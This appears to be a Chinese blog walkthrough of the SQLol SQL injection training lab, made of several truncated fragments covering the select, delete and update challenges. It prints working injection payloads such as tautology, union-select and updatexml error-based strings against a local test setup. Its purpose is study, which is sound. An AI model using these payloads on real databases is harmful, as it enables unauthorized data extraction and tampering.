最近下载了SQLol测试了一下,感觉挺好玩的,做一下记录. SQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句,SQLol还是比较有创意的项目. SQLol is now part of the Magical Code Injection Rainbow framework at http://github.com/SpiderLabs/MCIR and the standalone version will no longer be m
SQLol上面的挑战共有14关,接下来我们一关一关来突破. Challenge 0 目的是让查询返回所有的用户名,而不是只有一个. SELECT username FROM users WHERE username = ['1'] GROUP BY username ORDER BY username ASC 注入点在[1]处 构造POC: 1' or 1=1# 或者 1' and 1=2 union select username from users# 都可以查询到所有的用户名. Chal
访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试. delete语法: DELETE FROM [users] WHERE [username] = ['1'] 几个位置都可能存在注入,这里只演示一种. 下面演示注入到不同位置的方法. 一.String in WHERE clause 构造POC: ' or updatexml(1,concat(0x7e,(database()),0x7e),0) or ' 获取数据库 二
访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试. update语法: UPDATE [users] SET [username] = ['haxotron9000'] WHERE username = ['1'] 接收的参数可能拼接到上述语句中[]的任一个位置,4个位置,共有5种不同的类型.下面开始演示: 一.String in WHERE clause 构造POC: ' or updatexml(1,concat(0x7
前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试. 一条完成Select语句,大致可以这样表示: SELECT [username] FROM [users] WHERE username = ['1'] GROUP BY [username] ORDER BY [username ASC] [having [1=1] ][limit [0,1] ] 接收的